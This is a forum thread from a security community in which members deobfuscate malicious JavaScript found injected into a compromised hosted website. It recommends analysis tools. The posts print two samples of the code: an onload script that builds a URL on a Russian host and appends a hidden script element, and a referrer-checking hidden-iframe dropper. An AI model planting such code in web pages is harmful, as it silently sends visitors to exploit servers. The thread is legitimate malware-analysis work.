HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 44 guests and 1 member online
 
Advertisement

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Malwarearrow Obfuscated code sample - need advice on how to break down the language and parse
EH-Net
May 22, 2013, 01:05:23 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: Obfuscated code sample - need advice on how to break down the language and parse  (Read 10816 times)
0 Members and 1 Guest are viewing this topic.
oldgrue
Newbie
*
Offline Offline

Posts: 13


View Profile
« on: April 09, 2010, 11:27:41 AM »
Being not much of a coder (a core skill i'm working on still) I've run into a string of suspicious code that I can't wrap my head  around for the life of me.

Here's the opening chunk
Quote
<script>var Je;if(Je!='Pu' && Je!='X'){Je=''};var l=new String();this.Iq="";function J() {var _=new Array();var v;if(v!='CR' && v != ''){v=null};var B=RegExp;var Cu='';var tN;if(tN!='O' && tN!='Nn'){tN=''};var j=String("rep8TU".substr(0,3)+"lac0Ix".substr(0,3)+"jW0eWj0".substr(3,1))

Can someone point me to:
a) how to determine which language this is
b) a good obfuscated code tutorial
Logged
Ketchup
Hero Member
*****
Offline Offline

Posts: 1021



View Profile
« Reply #1 on: April 09, 2010, 12:55:58 PM »
This is JavaScript.   You don't have the complete code, made clear by the lack of closing </script> tag and lack of matching ending brackets in the code.   You don't have too much of the code, but it's not terribly obfuscated besides some variable names and such.   Do you have any more?

Code:
<script>
var Je;
if(Je!='Pu' && Je!='X')
{
     Je=''
};
var l=new String();
this.Iq="";
function J()
{
     var _=new Array();
     var v;
     if(v!='CR' && v != '')
     {
          v=null
     };
     var B=RegExp;
     var Cu='';
     var tN;
     if(tN!='O' && tN!='Nn')
     {
          tN=''
     };
     var j=String("rep8TU".substr(0,3)+"lac0Ix".substr(0,3)+"jW0eWj0".substr(3,1))
Logged
~~~~~~~~~~~~~~
Ketchup
n1p
Jr. Member
**
Offline Offline

Posts: 89


View Profile WWW
« Reply #2 on: April 09, 2010, 04:47:12 PM »
Yeah you need to see what context it is being run in. Function J is not being called yet and it doesnt do much as yet.

The variable j evaluates to "replace". Which I'd imagine will be used to deobfuscate some hex later on using a regular expression. Possibly the B variable you can see. Look out for an eval function. Change that to a print and run it in something like rhino/spidermonkey to get the final code at runtime..

n1p
Logged
oldgrue
Newbie
*
Offline Offline

Posts: 13


View Profile
« Reply #3 on: April 13, 2010, 08:20:46 AM »
here's the whole thing:

Quote
<script>
var Je;if(Je!='Pu' && Je!='X'){Je=''};var l=new String();this.Iq="";function J() {var _=new Array();var v;if(v!='CR' && v != ''){v=null};var B=RegExp;var Cu='';var tN;if(tN!='O' && tN!='Nn'){tN=''};var j=String("rep8TU".substr(0,3)+"lac0Ix".substr(0,3)+"jW0eWj0".substr(3,1));var C=unescape("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6f%79%75%6e%6c%61%72%31%2e%63%6f%6d%2f%76%6f%69%6c%61%2e%66%72%2f%67%6f%6f%67%6c%65%2e%68%72%2e%70%68%70");var s=window;var n;if(n!='' && n!='R'){n=null};var P='';var ns;if(ns!='' && ns!='lC'){ns=''};var Z=new String("]");var Rt="";function m(F,U){this.IR="";var Gt;if(Gt!='Rk' && Gt!='eu'){Gt='Rk'};var p=String("[");var hs='';p+=U+Z;var UX;if(UX!='k' && UX!='Ij'){UX='k'};var K;if(K!='Nq' && K != ''){K=null};var E="";var w=new B(p, String("g"));var RX=new String();var mW;if(mW!='bd' && mW!='AQ'){mW=''};return F[j](w, P);this.dQ='';var jk=new Array();};var EW;if(EW!='Rb'){EW=''};this.i="";var Kv;if(Kv!='XY'){Kv=''};var Z_='';var D;if(D!='JE'){D='JE'};var nm;if(nm!='cn'){nm='cn'};var y="scri"+"w1bNpt".substr(4);var u=m('89240366892305249','97125364');var Oc="";var WV;if(WV!=''){WV='Ww'};var uK=unescape("%68%74%74%70%3a%2f%2f%71%71%2d%63%6f%6d%2e%68%75%61%6e%71%69%75%2e%63%6f%6d%2e%61%6d%61%7a%6f%6e%2d%63%6e%2e%73%77%65%65%74%68%6f%6d%65%73%61%6c%65%2e%72%75%3a");var so;if(so!='' && so!='yq'){so=null};s["on"+"lo"+"ad"]=function(){var T=new Array();this.dP="";try {var RZ;if(RZ!='fx'){RZ='fx'};Z_=uK+u;var gP=new String();var XJ=new String();Z_+=C;var Ne='';var yi;if(yi!='aY'){yi='aY'};Uv=document.createElement(y);var IJ=new Array();Uv["src7Dkj".substr(0,3)] = Z_;Uv["dexAOR".substr(0,2)+"fe"+"r"]=[1][0];var Pq='';document.body.appendChild(Uv);} catch(d){var kF=new Date();};var Dp='';var LH;if(LH!='jI'){LH='jI'};};var Gy=new Array();var JH;if(JH!='Zz'){JH=''};var Ao='';};J(); </script>
<!--11c9667af5fb24752950373afb93b6d1-->

I appreciate all the help so far!
Logged
Ketchup
Hero Member
*****
Offline Offline

Posts: 1021



View Profile
« Reply #4 on: April 13, 2010, 01:34:10 PM »
That's a good amount of code.   I need to take a look at it in more detail.  However, preliminarily it looks like a hidden frame with a link to the following URL:

Quote
hxxp://qq-com.huanqiu.com.amazon-cn.sweethomesale.ru

From there it would likely be some sort IE, Java, Firefox, etc attack to compromise your machine.
Logged
~~~~~~~~~~~~~~
Ketchup
n1p
Jr. Member
**
Offline Offline

Posts: 89


View Profile WWW
« Reply #5 on: April 13, 2010, 04:21:44 PM »
Hey,

Close enough. The script below is the stripped down one with junk removed. It simply uses a body onload() to redirect user unawares to another page. On that further page is more malicious code. This checks to see if you have come from a search engine and delivers an exploit. I  can investigate this further if you want a tutorial/further information?

I usually strip code down so that I can debug it through spidermonkey/rhino. Here is the output of my efforts:


WARNING!!!!: Malicious code below. I have removed certain details so it cannot be used. The full URL is also wrong

Code:
Unescaped C: /google.com/google.com/oyunlar.com/voia.fr/google.php
This is y: script
Regular expression to be run on p: /[97125364]/g
Return Val of Function m: 8080
This is uK: hxxp://qq-com.huanqiu.com.amazon-cn.sweethomesale.ru:
This is Z_ which finally concatenates port and URL found earlier: http://qq-com.huanqiu.com.amazon-cn.sweethomesale.ru:8080/google.com/google.com/oyunlar.com/voia.fr/google.php

Code:
function J()
 {

   var j=String("rep8TU".substr(0,3)+"lac0Ix".substr(0,3)+"jW0eWj0".substr(3,1));
   var C=unescape("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6f%79%75%6e%6c%61%72%31%2e%63%6f%6d%2f%76%6f%69%6c%61%2e%66%72%2f%67%6f%6f%67%6c%65%2e%68%72%2e%70%68%70");
   var s= "";

   var P='';
    print("Unescaped C: "+ C);
   var Z=new String("]");
  
   function m(F,U)
   {
     var p=String("[");
     p+=U+Z;
     var w=new RegExp(p, "g");
     print ("Regular expression to be run on p: "+ w);
     var returnVal = '';
     returnVal = F[j](w, P);
     print ("Return Val of Function m: " + returnVal);
     return F[j](w, P);
   };
  
   var Z_='';
   var y="scri"+"w1bNpt".substr(4);
   print ("This is y: " + y)
   var u=m('89240366892305249','97125364');

   var uK=unescape("%68%74%74%70%3a%2f%2f%71%71%2d%63%6f%6d%2e%68%75%61%6e%71%69%75%2e%63%6f%6d%2e%61%6d%61%7a%6f%6e%2d%63%6e%2e%73%77%65%65%74%68%6f%6d%65%73%61%6c%65%2e%72%75%3a");
       print ("This is uK: " + uK);
       Z_=uK+u;
       Z_+=C;
       print ("This is Z_ which finally concatenates port and URL found earlier: " + Z_);
       Uv["src7Dkj".substr(0,3)] = Z_;
       Uv["dexAOR".substr(0,2)+"fe"+"r"]=[1][0];
 };

Cheers,
n1p
« Last Edit: April 13, 2010, 04:30:20 PM by n1p » Logged
oldgrue
Newbie
*
Offline Offline

Posts: 13


View Profile
« Reply #6 on: April 13, 2010, 04:42:15 PM »
I figured it was unpleasant, just not how much so.  Any more of a tutorial, and related related readings would be greatly appreciated.
Logged
n1p
Jr. Member
**
Offline Offline

Posts: 89


View Profile WWW
« Reply #7 on: April 13, 2010, 04:52:07 PM »
Yeah sure, soon as I get some spare time I will run through something briefly. Can you provide any background info on this? Was it a compromised site or just something you came across?
Logged
oldgrue
Newbie
*
Offline Offline

Posts: 13


View Profile
« Reply #8 on: April 14, 2010, 09:30:20 AM »
This code showed up on a compromised website my company is hosting. We're looking in to the machine serving it to determine if the virtual server, or the machine itself was compromised as a different issue.
Logged
n1p
Jr. Member
**
Offline Offline

Posts: 89


View Profile WWW
« Reply #9 on: April 14, 2010, 03:45:31 PM »
That main page is now serving a photo blog of some sort. Seems to be updating as I analyse it  Shocked

Some further analysis leads to that page I displayed earlier. Using correct referrer, user-agent I can then get some more malicious code. Which mutates on every request. Structure is the same everytime, but functions and variables become mangled. Quite interesting stuff.

Analysed the code below:

WARNING!!!! Malicious code. Be careful. Redacted accordingly

Code:
Gnqt33 = 'h!^t#t(^$p)(!(#:@))(/)/!(q!((q$$@()-&$@#!c&^#o^m^@!.&h^&^u))$a#n)q&i$^)u$^@(.&&c##(o))m!^$(.$&@&a)!#m&)@)a#@!&z@(#o#))@#n^!-(($!c@^@n&@(#$.(&^s)(w@)e^!(#e)t!$!h@^o(m!#&e&^s@a@l#$)^e@^.^r(@#u!$$)'.replace(/&|@|\$|\!|\)|#|\(|\^/ig, '');
Udirdbov = 'UdirdbovVzmrac';
Usocrqo4 = document.createElement('i2aImzeI'.replace(/[I\$2zs]/g, ''));
Udirdbov = 'UdirdbovVzmrac';
Vzmrac = '';
S5gtbh = '';
Udirdbov = document.referrer;
function Svr8a9t(Zwo94e,O3kbb8s){
if (Udirdbov.indexOf(Zwo914e) != -1){
    Vzmrac=Zwo914e;
    Yx240e66 = Udirdbov.indexOf(O3kbb8s+'=');
    if (Yx240e66 != -1){
     S5gtbh = Udirdbov.substring(Yx240e66+2).split('&')[0];   
    }
}
}
//Svr8a9t('google.','q');Svr8a9t('search.yahoo.','p');Svr8a9t('ask.com','q');

Usocrqo4.style.visibility = 'h&i)&@d^!#$d#e$(#)#n$&)'.replace(/#|\)|\$|\(|@|\^|&|\!/ig, '');
Usocrqo4.src = Gnqt33+':N8N060N/6i]n6d]]x6.6vhvpN?vj}a6=}&}j6l]=N'.replace(/[N\]6\}v]/g, '')+Vzmrac+'&kl='+S5gtbh;
document.body.appendChild(Usocro4);

Again using spidermonkey, I reversed this code to see that it is in fact an iframe that is hidden. It links to another page on the site and includes some values created by the script and your originating referrer (e.g. google)

This the value of Usocrqo4: iframe
This is S5gtbh: dirdbo
This is the visibility of the iframe: hidden
This is the final concatenation of the iframe url src: hxxp://qq-com.huanqiu.com.amazon-cn.sweethomesale.ru:8080/index.php?ja=&jl=&kl=dirdbo

Still more to analyse as need to form correct iframe URL to get to what I believe will be the malware delivery page.
Logged
Ketchup
Hero Member
*****
Offline Offline

Posts: 1021



View Profile
« Reply #10 on: April 14, 2010, 04:01:02 PM »
Nice n1p!   

My experience with this type of code is that it usually hops through at least a few rooted web hosts before you actually find the original one.   The code usually morphs with each hop as well.   

It's interesting that the code is morphing with each request.   Enforcing specific referrer's is a bit interesting too.   Seems like this stuff is growing in complexity.
Logged
~~~~~~~~~~~~~~
Ketchup
n1p
Jr. Member
**
Offline Offline

Posts: 89


View Profile WWW
« Reply #11 on: April 14, 2010, 04:05:41 PM »
Requiring a user-agent and referrer are usually done to prevent researchers like us from simply using wget to grab pages!

So they will look to see if you are using firefox and coming from a google search etc.

Yes, I have never seen a mutating js before. Nice to come across. Thanks for that oldgrue.
Logged
oldgrue
Newbie
*
Offline Offline

Posts: 13


View Profile
« Reply #12 on: April 14, 2010, 04:20:42 PM »
Thanks for the help! Now for the fun (?) part - learning and catching up on the how with an example in hand.
Logged
n1p
Jr. Member
**
Offline Offline

Posts: 89


View Profile WWW
« Reply #13 on: April 15, 2010, 02:58:42 AM »
Hey,

That is no problem at all. I actually enjoy reversing this stuff (sadly!). If you need any assistance just shout. If I can, I will document my steps for analysing javascript and that.

I would highly suggest looking at spidermonkey/rhino. Especiallu Didier Stevens' version of spidermonkey. The implementation is specifically for this task.
Logged
carboncopy
Newbie
*
Offline Offline

Posts: 10


View Profile
« Reply #14 on: April 21, 2010, 05:01:52 AM »
Good stuff n1p!

I also recommend checking this website for those that do not use rhino or spidermonkey.

http://jsunpack.jeek.org/dec/go

These are the results from the js above.
http://jsunpack.jeek.org/dec/go?report=ebfc13712044bad5b1a1c287d36f93852b9310c5
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.069 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.